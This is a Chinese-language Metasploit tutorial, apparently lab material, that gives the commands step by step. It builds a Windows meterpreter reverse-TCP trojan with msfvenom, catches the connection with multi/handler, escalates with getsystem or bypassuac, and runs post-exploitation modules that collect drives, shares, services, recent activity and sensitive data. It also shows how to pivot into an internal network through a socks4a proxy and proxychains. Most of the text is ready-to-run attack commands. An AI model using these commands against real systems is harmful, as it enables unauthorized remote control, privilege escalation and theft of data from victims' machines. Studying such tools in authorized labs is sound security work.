metasploit-framework功能模块介绍
1.msfconsole
作用:
管理生成exp,管理反弹的shell,通过反弹的shell进行后渗透。。。
模块介绍:
exploits:攻击脚本
payloads:攻击载荷(攻击效果控制)
auxiliaru:辅助模块(扫描工具等)
post:后渗透模块(提取信息)
encoders编码模块
nops:无操作生成器
2.msfvenom
作用:
制作木马
3.msfencode
作用:
对木马进行编码
metasploit-framework简单运用
1.初始化metasploit-framework
msfconsole
2.查看payload模块
show payloads
3.使用payload:windows/x64/meterpreter/reverse_tcp。
use windows/x64/meterpreter/reverse_tcp
4.另打开一个终端,使用msfvenom制作windows/x64/meterpreter/reverse_tcp木马
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.106 lport=4444 -f exe -o a.exe
5.使用攻击模块exploit/multi/handler,并查看选项
use exploit/multi/handler
show options
6.设置目标机器上对应的木马模块
set payload windows/x64/meterpreter/reverse_tcp
7.设置目标机器连接的主机IP
set lhost 192.168.1.106
8.开始监听,当目标机器运行对应的木马文件就能操作目标机器
exploit
metasploit-framework反弹shell
提升受害者机器的权限(如果提权失败,可以尝试使用Exploit/windows/local/bypassuac模块)
getsystem
get shell并执行系统命令
shell
metasploit-framework信息收集
获取目标机器最近的系统盘信息
run post/windows/gather/forensics/enum_drives
判断目标机器是否为虚拟机
run post/windows/gather/checkvm
获取目标机器分享文件信息
run post/windows/gather/enum_shares
获取目标机器开启的服务
run post/windows/gather/enum_services
获取目标机器最近的操作
run post/windows/gather/dumplinks
使用脚本获取目标机器敏感信息,并在/root/.msf4/logs/scripts/winenum目录下生成报告。
run winenum
cd /root/.msf4/logs/scripts/winenum
metasploit-framework反向代理
reverse 反向的
1.执行ipconfig查看目标机器的IP详情,目标Windows server 2008的IP地址有192.168.1.105和10.10.10.1,演示10.10.10.1
ipconfig
2.将该模块添加到后台运行
background
3.添加10.10.10.1 网段的路由
route add 10.10.10.1 255.0.0.0 1
4.显示路由
route print
5.开启socks4代理 服务
use auxiliary/server/socks4a
6.将该功能添加到后台运行
exploit -y
7.查看到1080端口开放,代理已经开启
netstat -anpt
8.修改Linux代理的配置文件,如下图
vim /etc/proxychains.conf
9.使用proxychains直接代理连接目标服务器即可
proxychains rdesktop 10.10.10.1